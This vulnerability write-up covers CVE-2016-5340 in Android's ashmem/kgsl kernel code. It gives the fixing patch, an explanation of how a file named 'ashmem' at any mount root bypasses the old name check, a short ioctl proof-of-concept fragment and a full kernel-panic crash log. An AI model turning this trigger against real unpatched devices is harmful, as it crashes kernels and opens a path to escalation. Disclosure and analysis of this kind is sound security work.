CVE-2016-5340

patch

 static int is_ashmem_file(struct file *file)
{

- char fname[256], *name;
- name = dentry_path(file->f_dentry, fname, 256);
- return strcmp(name, "/ashmem") ? 0 : 1;
+ return (file->f_op == &ashmem_fops);
}
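Review bot: The new test `return (file->f_op == &ashmem_fops);` deserves a comment saying why identity is decided by the file operations and not by name, so that a later reader is not tempted to reintroduce a path check: `/* Match on ashmem's own file_operations: dentry_path() is relative to the mount point, so a name comparison would accept any file called ashmem at the root of another mount. */`. The removed dentry_path()/strcmp() pair is exactly the check that the mount listing on this page shows to be forgeable. The whole function is inside the hunk; the comparison presumably relies on ashmem_fops being declared in this translation unit, which the hunk does not show.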

dentry_path: 获取文件的完整路径（相对于挂载点）

shell@hammerhead:/ $ mount
rootfs / rootfs ro,seclabel,relatime 0 0
tmpfs /dev tmpfs rw,seclabel,nosuid,relatime,mode=755 0 0
devpts /dev/pts devpts rw,seclabel,relatime,mode=600 0 0
proc /proc proc rw,relatime 0 0
sysfs /sys sysfs rw,seclabel,relatime 0 0
selinuxfs /sys/fs/selinux selinuxfs rw,relatime 0 0
debugfs /sys/kernel/debug debugfs rw,relatime 0 0
none /acct cgroup rw,relatime,cpuacct 0 0
none /sys/fs/cgroup tmpfs rw,seclabel,relatime,mode=750,gid=1000 0 0
tmpfs /mnt/obb tmpfs rw,seclabel,relatime,mode=755,gid=1000 0 0
none /dev/cpuctl cgroup rw,relatime,cpu 0 0
/dev/block/platform/msm_sdcc.1/by-name/system /system ext4 ro,seclabel,relatime,data=ordered 0 0
/dev/block/platform/msm_sdcc.1/by-name/userdata /data ext4 rw,seclabel,nosuid,nodev,noatime,nomblk_io_submit,noauto_da_alloc,errors=panic,data=ordered 0 0

so: because dentry_path returns the path relative to the mount point, a file named `ashmem` placed at the root of any mount is also reported as "/ashmem" and passes the strcmp check:


data, system, proc, /mnt/obb
/data/ashmem : /ashmem
/data/local/tmp/ashmem: /local/tmp/ashmem
/mnt/obb/ashmem: /ashmem

poc

/* PoC fragment: fd_kgsl and param are declared outside this snippet. */
fd_kgsl = open("/dev/kgsl-3d0", O_RDWR);
/* The crash backtrace below shows this ioctl reaching get_ashmem_file() via
 * kgsl_ioctl_map_user_mem(), i.e. the path guarded by is_ashmem_file().
 * Neither the open() nor the ioctl() return value is checked here. */
ioctl(fd_kgsl, IOCTL_KGSL_MAP_USER_MEM, &param);

crash log

 dev="proc" ino=10477 scontext=u:r:untrusted_app:s0 tcontext=u:r:radio:s0 tclass=dir
[ 269.002841] Unable to handle kernel NULL pointer dereference at virtual address 00000114
[ 269.003276] pgd = e9f24000
[ 269.003497] [00000114] *pgd=33293831, *pte=00000000, *ppte=00000000
[ 269.020211] Internal error: Oops: 17 [#1] PREEMPT SMP ARM
[ 269.020398] CPU: 0 Not tainted (3.4.0-gd59db4e #1)
[ 269.020506] PC is at get_ashmem_file+0x78/0x154
[ 269.020676] LR is at is_ashmem_file+0x3c/0x68
[ 269.020772] pc : [<c078e704>] lr : [<c078df24>] psr: 20000013
[ 269.020776] sp : eb73ddb8 ip : eb73dc98 fp : eb73de1c
[ 269.021027] r10: 00000004 r9 : c10e9008 r8 : eb73de5c
[ 269.021196] r7 : eb73de58 r6 : eb73de54 r5 : c103a488 r4 : ebbc9240
[ 269.021291] r3 : 19761abc r2 : 00000000 r1 : c0deb698 r0 : 00000000
[ 269.021464] Flags: nzCv IRQs on FIQs on Mode SVC_32 ISA ARM Segment user
[ 269.021560] Control: 10c5787d Table: 3232406a DAC: 00000015
[ 269.021729]
[ 269.021731] PC: 0xc078e684:
[ 269.021906] e684 c011b554 c12a52b4 e1a0c00d e92ddff0 e24cb004 e24dd03c e52de004 e8bd4000
[ 269.022856] e6a4 e59f511c e1a08003 e1a06001 e1a07002 e1a0a000 e5953000 e50b3030 ebeb5d64
[ 269.023810] e6c4 e3a0c000 e586c000 e587c000 e2504000 0a000036 e59f90ec e1d931b2 e3130004
[ 269.024684] e6e4 1a000018 e1a00004 ebfffdfd e3500000 0a00000d e594207c e3a00000 e5864000
[ 269.025645] e704 e5923114 e5873000 e5923118 e5883000 e51b2030 e5953000 e1520003 1a000001
[ 269.026609] e724 e24bd028 e89daff0 ebe81142 e1a0100a e59f0094 eb0a27bf e1a00004 ebeb5e68
[ 269.027563] e744 e3e00000 eafffff1 e1a0200d e3c23d7f e3c3303f e24b0041 e593300c e593c224
[ 269.028451] e764 e1a01003 e50bc048 ebeb6f73 e594300c e1a02006 e51bc048 e594e01c e5933020
[ 269.029408]
[ 269.029411] LR: 0xc078dea4:
[ 269.029585] dea4 e594311c e5941118 e5902008 e0810003 e1500002 8afffff1 e1a00003 e3a02000
[ 269.030541] dec4 e12fff36 e595300c e59301ec e2800038 ebe8ad33 e3a00000 e89da878 e3e00015
[ 269.031501] dee4 e89da878 e1a0c00d e92dd810 e24cb004 e24ddf43 e52de004 e8bd4000 e59f4040
[ 269.032466] df04 e3a02c01 e24b1f46 e590000c e5943000 e50b3018 ebebb5a7 e59f1028 ebf19143
[ 269.033348] df24 e51b2018 e5943000 e2700001 33a00000 e1520003 1a000001 e24bd010 e89da810
[ 269.034303] df44 ebe8133c c103a488 c0deb690 e1a0c00d e92ddff0 e24cb004 e24dd00c e52de004
[ 269.035262] df64 e8bd4000 e5913004 e1a09001 e3530000 0a00003b e5913000 e3130080 0a00003c
[ 269.036153] df84 e59f60f4 e286003c eb0a64db e3500000 0a000037 e5b64058 e1540006 e5945000
[ 269.037106]
[ 269.037108] SP: 0xeb73dd38:
[ 269.037357] dd38 ebbc9300 ea7f67c0 eb73dd5c c078e704 20000013 ffffffff eb73dda4 eb73de5c
[ 269.038229] dd58 c10e9008 00000004 eb73de1c eb73dd70 c0106e98 c010022c 00000000 c0deb698
[ 269.039179] dd78 00000000 19761abc ebbc9240 c103a488 eb73de54 eb73de58 eb73de5c c10e9008
[ 269.040129] dd98 00000004 eb73de1c eb73dc98 eb73ddb8 c078df24 c078e704 20000013 ffffffff
[ 269.041004] ddb8 000080d0 c04aad10 0000005c c0a29194 eb73c000 c0a2925c eb73de0c c03f06e0
[ 269.041953] ddd8 ec044ff8 c03f0780 eb73de0c eb73ddf0 c03f0780 19761abc ea461e00 eb73c000
[ 269.042829] ddf8 00500000 ed2b0580 eb73de94 ebbc90c0 00002000 ea2318f0 eb73de8c eb73de20
[ 269.043775] de18 c04ab018 c078e698 c027147c c026f070 eded7280 c026eeb0 eb73de6c 14104a1b
[ 269.044652]
[ 269.044654] IP: 0xeb73dc18:
[ 269.044901] dc18 ec495100 c0278008 eb73dc64 eb73dc30 c0278bb4 c0277fd0 00000000 00000000
[ 269.045780] dc38 00000028 00010000 c027c0ec c1034300 ec523480 eb73dc9c eb73de58 c027b63c
[ 269.046749] dc58 eb73dc94 eb73dc68 c027b63c c0a29650 eb73dc84 00000100 c039bab0 00000000
[ 269.047633] dc78 eb73dc94 c103a488 c103a488 eb73de54 eb73ddb4 00000017 eb73dd70 c104541c
[ 269.048594] dc98 00000114 eb73de5c c10e9008 00000004 eb73dd6c eb73dcb8 c0100284 c0114744
[ 269.049476] dcb8 00000000 ec523100 ec523680 00000000 ebbc90c0 ec6498c0 eb73dcec eb73dce0
[ 269.050434] dcd8 c0a26edc c0a26d50 eb73dd1c eb73dcf0 c0384648 c0a26ed0 ec523124 00000000
[ 269.051397] dcf8 eb73dd1c ebbc90c0 c12866f0 c103a488 ebbc9300 ea7f67c0 ebbc90d4 ebbc90d0
[ 269.052351]
[ 269.052353] FP: 0xeb73dd9c:
[ 269.052527] dd9c eb73de1c eb73dc98 eb73ddb8 c078df24 c078e704 20000013 ffffffff 000080d0
[ 269.053480] ddbc c04aad10 0000005c c0a29194 eb73c000 c0a2925c eb73de0c c03f06e0 ec044ff8
[ 269.054363] dddc c03f0780 eb73de0c eb73ddf0 c03f0780 19761abc ea461e00 eb73c000 00500000
[ 269.055324] ddfc ed2b0580 eb73de94 ebbc90c0 00002000 ea2318f0 eb73de8c eb73de20 c04ab018
[ 269.056282] de1c c078e698 c027147c c026f070 eded7280 c026eeb0 eb73de6c 14104a1b 00000008
[ 269.057240] de3c ed34ac20 00000020 eb73df60 00000004 eac28c00 eb73de90 ebbc9240 00000000
[ 269.058119] de5c 00002000 eb73decc c01c0915 0000001c ea7f67c0 c103a488 c04aaccc eb73de94
[ 269.059070] de7c bed22a68 eb73df04 eb73de90 c04aa810 c04aacd8 ed59b6d0 00000004 00501000
[ 269.060026]
[ 269.060029] R1: 0xc0deb618:
[ 269.060202] b618 613e363c 656d6873 69203a6d 6974696e 7a696c61 000a6465 2f766564 6d687361
[ 269.061160] b638 002f6d65 2f766564 6d687361 00006d65 613e333c 656d6873 66203a6d 656c6961
[ 269.062118] b658 6f742064 726e7520 73696765 20726574 6373696d 76656420 21656369 0000000a
[ 269.063000] b678 613e363c 656d6873 75203a6d 616f6c6e 0a646564 00000000 6873612f 006d656d
[ 269.063958] b698 613e333c 656d6873 25203a6d 72203a73 65757165 64657473 74616420 72662061
[ 269.064909] b6b8 66206d6f 20656c69 63736564 74706972 7420726f 20746168 73656f64 2074276e
[ 269.065797] b6d8 73697865 000a2e74 706c6966 20702520 76656472 20642520 20646970 25287525
[ 269.066754] b6f8 66202973 20656c69 25287025 2029646c 20766564 203a6469 000a6425 663e333c
[ 269.067710]
[ 269.067713] R4: 0xebbc91c0:
[ 269.067888] 91c0 00000000 00000000 ed3c8a00 00000000 00000000 00000000 00000000 00000000
[ 269.068842] 91e0 00000000 00000000 ffffffff ffffffff 00000000 00000000 eb761dc0 eb761b00
[ 269.069803] 9200 ebbc9200 ebbc9200 ebbc9208 ebbc9208 ed34d5f0 00000000 00000000 00000000
[ 269.070680] 9220 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 269.071635] 9240 ebbc9cc0 fefe1274 ed2f3e50 ec523480 c0b19540 00000000 00000000 00000002
[ 269.072584] 9260 00020002 0000001f 00000000 00000000 00000000 00000000 00000000 00000000
[ 269.073465] 9280 00000000 00000000 eaff1d00 00000000 00000000 00000000 00000000 00000020
[ 269.074334] 92a0 00000000 00000000 ffffffff ffffffff 00000000 00000000 ea7f6800 00000000
[ 269.075298]
[ 269.075301] R5: 0xc103a408:
[ 269.075477] a408 0fbd0b82 c561aad9 046a0e5f ceb6af04 90d34de8 5a0fecb3 a5d9c4e1 6f0565ba
[ 269.076437] a428 31608756 fbbc260d 3ab7828b f06b23d0 ae0ec13c 64d26067 215c8068 4a3d3003
[ 269.077396] a448 a02ec7d8 e2850203 a3c40529 c9478a99 5269f8b0 155b7d2b a6c55264 4fb78cab
[ 269.078270] a468 db234dfd f3d3f258 c0dad457 449e4cdb 3c1e80d2 59791ef8 00000001 00000000
[ 269.079152] a488 19761abc c010d028 ffffffff 00000009 0007b0d7 c0118560 c0118514 c01182c0
[ 269.080109] a4a8 c011836c c0118384 c0118384 c0118388 c0118388 c0118404 c01184ec c01184fc
[ 269.081061] a4c8 c011843c c0118484 c01184b8 00000022 ffffffff 00000000 fa002000 fa003000
[ 269.082008] a4e8 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 269.082886]
[ 269.082888] R6: 0xeb73ddd4:
[ 269.083137] ddd4 c03f06e0 ec044ff8 c03f0780 eb73de0c eb73ddf0 c03f0780 19761abc ea461e00
[ 269.084019] ddf4 eb73c000 00500000 ed2b0580 eb73de94 ebbc90c0 00002000 ea2318f0 eb73de8c
[ 269.084972] de14 eb73de20 c04ab018 c078e698 c027147c c026f070 eded7280 c026eeb0 eb73de6c
[ 269.085926] de34 14104a1b 00000008 ed34ac20 00000020 eb73df60 00000004 eac28c00 eb73de90
[ 269.086876] de54 ebbc9240 00000000 00002000 eb73decc c01c0915 0000001c ea7f67c0 c103a488
[ 269.087752] de74 c04aaccc eb73de94 bed22a68 eb73df04 eb73de90 c04aa810 c04aacd8 ed59b6d0
[ 269.088711] de94 00000004 00501000 00000000 00000000 00500000 00000001 00000000 00000009
[ 269.089669] deb4 00000001 eb73c000 eb73df14 00000000 00000001 ed34ac20 eaff1d00 eb73defc
[ 269.090551]
[ 269.090554] R7: 0xeb73ddd8:
[ 269.090803] ddd8 ec044ff8 c03f0780 eb73de0c eb73ddf0 c03f0780 19761abc ea461e00 eb73c000
[ 269.091762] ddf8 00500000 ed2b0580 eb73de94 ebbc90c0 00002000 ea2318f0 eb73de8c eb73de20
[ 269.092645] de18 c04ab018 c078e698 c027147c c026f070 eded7280 c026eeb0 eb73de6c 14104a1b
[ 269.093604] de38 00000008 ed34ac20 00000020 eb73df60 00000004 eac28c00 eb73de90 ebbc9240
[ 269.094559] de58 00000000 00002000 eb73decc c01c0915 0000001c ea7f67c0 c103a488 c04aaccc
[ 269.095443] de78 eb73de94 bed22a68 eb73df04 eb73de90 c04aa810 c04aacd8 ed59b6d0 00000004
[ 269.096406] de98 00501000 00000000 00000000 00500000 00000001 00000000 00000009 00000001
[ 269.097364] deb8 eb73c000 eb73df14 00000000 00000001 ed34ac20 eaff1d00 eb73defc 19761abc
[ 269.098314]
[ 269.098316] R8: 0xeb73dddc:
[ 269.098492] dddc c03f0780 eb73de0c eb73ddf0 c03f0780 19761abc ea461e00 eb73c000 00500000
[ 269.099442] ddfc ed2b0580 eb73de94 ebbc90c0 00002000 ea2318f0 eb73de8c eb73de20 c04ab018
[ 269.100320] de1c c078e698 c027147c c026f070 eded7280 c026eeb0 eb73de6c 14104a1b 00000008
[ 269.101272] de3c ed34ac20 00000020 eb73df60 00000004 eac28c00 eb73de90 ebbc9240 00000000
[ 269.102229] de5c 00002000 eb73decc c01c0915 0000001c ea7f67c0 c103a488 c04aaccc eb73de94
[ 269.103183] de7c bed22a68 eb73df04 eb73de90 c04aa810 c04aacd8 ed59b6d0 00000004 00501000
[ 269.104066] de9c 00000000 00000000 00500000 00000001 00000000 00000009 00000001 eb73c000
[ 269.105015] debc eb73df14 00000000 00000001 ed34ac20 eaff1d00 eb73defc 19761abc c0398d0c
[ 269.105967]
[ 269.105969] R9: 0xc10e8f88:
[ 269.106145] 8f88 0000002c 00000000 c0d4c634 c0babed4 c0de8d3c c0de8db4 00000033 00000000
[ 269.107094] 8fa8 c0d4c634 c0babed4 c0de8d3c c0de8de0 0000003a 00000000 c0d4c634 c0babed4
[ 269.108046] 8fc8 c0de8d3c c0de8e00 0000004b 00000000 c0de8ed0 c0babeec c0de8ed8 c0de8e1c
[ 269.108925] 8fe8 0000001e 00000000 c0de8ed0 c0babeec c0de8ed8 c0de8e3c 00000026 00000000
[ 269.109881] 9008 c0deb640 c0bac2e8 c0deb748 c0deb6e0 0000032c 00000000 c0deb640 c0bac2f8
[ 269.110837] 9028 c0deb748 c0deb6e8 00000343 00000000 c0d06940 c0bac57c c0ded100 c0d6a0d0
[ 269.111798] 9048 000000eb 00000000 c0d06940 c0bac5a8 c0ded100 c0debe08 0000043f 00000000
[ 269.112684] 9068 c0d06940 c0bac5a8 c0ded100 c0debe28 00000441 00000000 c0d06940 c0bac5a8
[ 269.113573] Process poc (pid: 3498, stack limit = 0xeb73c2f0)
[ 269.113744] Stack: (0xeb73ddb8 to 0xeb73e000)
[ 269.113841] dda0: 000080d0 c04aad10
[ 269.114015] ddc0: 0000005c c0a29194 eb73c000 c0a2925c eb73de0c c03f06e0 ec044ff8 c03f0780
[ 269.114113] dde0: eb73de0c eb73ddf0 c03f0780 19761abc ea461e00 eb73c000 00500000 ed2b0580
[ 269.114287] de00: eb73de94 ebbc90c0 00002000 ea2318f0 eb73de8c eb73de20 c04ab018 c078e698
[ 269.114459] de20: c027147c c026f070 eded7280 c026eeb0 eb73de6c 14104a1b 00000008 ed34ac20
[ 269.114633] de40: 00000020 eb73df60 00000004 eac28c00 eb73de90 ebbc9240 00000000 00002000
[ 269.114733] de60: eb73decc c01c0915 0000001c ea7f67c0 c103a488 c04aaccc eb73de94 bed22a68
[ 269.114907] de80: eb73df04 eb73de90 c04aa810 c04aacd8 ed59b6d0 00000004 00501000 00000000
[ 269.115078] dea0: 00000000 00500000 00000001 00000000 00000009 00000001 eb73c000 eb73df14
[ 269.115176] dec0: 00000000 00000001 ed34ac20 eaff1d00 eb73defc 19761abc c0398d0c 00000000
[ 269.115349] dee0: ebbc9300 00000005 ebbc9300 bed22a68 ed34ac20 00000000 eb73df74 eb73df08
[ 269.115522] df00: c02753ac c04aa5dc c0279324 00000000 00000000 00000001 00000000 ed59b6d0
[ 269.115695] df20: ededee00 eb73df0c 00000005 00000000 bed22a68 c01c0915 ebbc9300 00000005
[ 269.115792] df40: eb73c000 00000000 eb73df64 00000000 bed22a68 c01c0915 ebbc9300 00000005
[ 269.115964] df60: eb73c000 00000000 eb73dfa4 eb73df78 c0275950 c0275324 ffffffff 00000000
[ 269.116141] df80: c0107544 00000000 bed22a68 ffffffff 00000036 c0107544 00000000 eb73dfa8
[ 269.116317] dfa0: c0107300 c02758e0 00000000 bed22a68 00000005 c01c0915 bed22a68 bed22a38
[ 269.116414] dfc0: 00000000 bed22a68 ffffffff 00000036 000080f4 00000000 00000000 bed22aec
[ 269.116589] dfe0: 00500000 bed22a28 0000e377 0001120c 80000010 00000005 00000000 00000000
[ 269.116793] [<c078e704>] (get_ashmem_file+0x78/0x154) from [<c04ab018>] (kgsl_ioctl_map_user_mem+0x34c/0xa00)
[ 269.116981] [<c04ab018>] (kgsl_ioctl_map_user_mem+0x34c/0xa00) from [<c04aa810>] (kgsl_ioctl+0x240/0x31c)
[ 269.117088] [<c04aa810>] (kgsl_ioctl+0x240/0x31c) from [<c02753ac>] (do_vfs_ioctl+0x94/0x5bc)
[ 269.117267] [<c02753ac>] (do_vfs_ioctl+0x94/0x5bc) from [<c0275950>] (sys_ioctl+0x7c/0x8c)
[ 269.117453] [<c0275950>] (sys_ioctl+0x7c/0x8c) from [<c0107300>] (ret_fast_syscall+0x0/0x30)
[ 269.117632] Code: 0a00000d e594207c e3a00000 e5864000 (e5923114)
[ 269.121735] ---[ end trace 032dae055767b39f ]---
[ 269.121877] Kernel panic - not syncing: Fatal exception
[ 270.122308] Rebooting in 5 seconds..
[ 275.123947] Going down for restart now
[ 275.124870] Calling SCM to disable SPMI PMIC arbiter